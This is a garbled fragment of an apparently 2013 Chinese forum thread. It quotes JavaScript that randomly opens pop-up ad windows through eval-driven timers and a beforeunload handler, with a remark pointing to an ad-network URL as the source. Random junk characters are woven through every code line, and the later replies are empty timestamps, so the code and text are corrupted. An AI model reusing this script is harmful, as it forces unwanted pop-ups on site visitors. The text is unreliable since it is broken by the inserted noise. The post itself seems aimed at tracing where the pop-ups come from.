- } $ x3 J$ Z: @; S& j
- for (var i = 1; i <= 10; i++) { l8 q3 \* [. s( o) w. `
- var n = i == 1 ? "": i; % z/ c4 ^& v3 ?$ C q
- if (eval("_pt" + n + "b") > Math.random()) { . C6 `3 s: r6 x% K$ s# y
- setTimeout(function() {
+ e+ l4 M! G. Y, M4 r1 U - setTimeout(function() { ) |, l, {% I% h2 q& [
- pop(url, {
# O% p4 z( b: P9 t - a: 1, 2 B0 c2 k. a$ ^, F
- b: 2
, g# Q. j6 e* K ~, p - }) 4 v4 R$ X' f# W# } T' F6 O8 Q
- },
' m7 ` H0 ~, ^0 R3 u - 300) ( g o/ e4 G8 e$ h
- },
8 _; X4 o, t! c - parseInt(eval("_pt" + n + "a")) * 1000)
( s/ J" y0 T% H: R+ _: y8 J5 s - }
5 N& h+ l4 f9 y0 W* |3 D - } # R( l- v, H. e9 Z
- if (_pc2 > Math.random()) {
% M" F8 Q) N7 F( r( s1 E - a_pop(url) - Z, L* k' ]9 P+ k
- } 1 }. W: l5 q+ F6 I, h% [% M3 {, b% t
- if (_po > Math.random()) { 8 }1 t/ N6 i- P, x, t7 F
- try {
]9 H4 @8 ^0 d& M( ]7 F$ ? - func(url) : X+ O1 N( s8 K7 i- d5 C8 p5 T' S
- } catch(q) {}
0 u8 _' t+ C1 E, l9 _ - }
% o6 [8 z2 ?9 T* e( K - } 3 c! m9 A2 N# }; v/ b2 s- D( F$ O
- }; ; `6 g6 V) A( r
- fstart(aa_url);
+ Q5 Y4 T7 b4 \' z - event(window, 'beforeunload',
5 O, z2 k0 y0 x. a- }; z - function() {})
7 c/ v h& Q/ C5 @: h3 S2 _9 r - })();
URL从这里产生3 w1 K3 `7 z# ^( k8 S
. h2 v1 M- }% }' q/ @2 ?http://play.unionsky.cn/show/?placeid=141830) x% r4 ], S- F. d
& V0 O& D8 D. u2 \8 `4 ~+ o9 p, [
! [( @+ s, l+ D+ C; y( @% U |
发表于 2013-12-17 15:03:03
楼主
D:1
发表于 2013-12-17 15:31:30
发表于 2013-12-17 16:34:22
发表于 2013-12-17 19:34:38
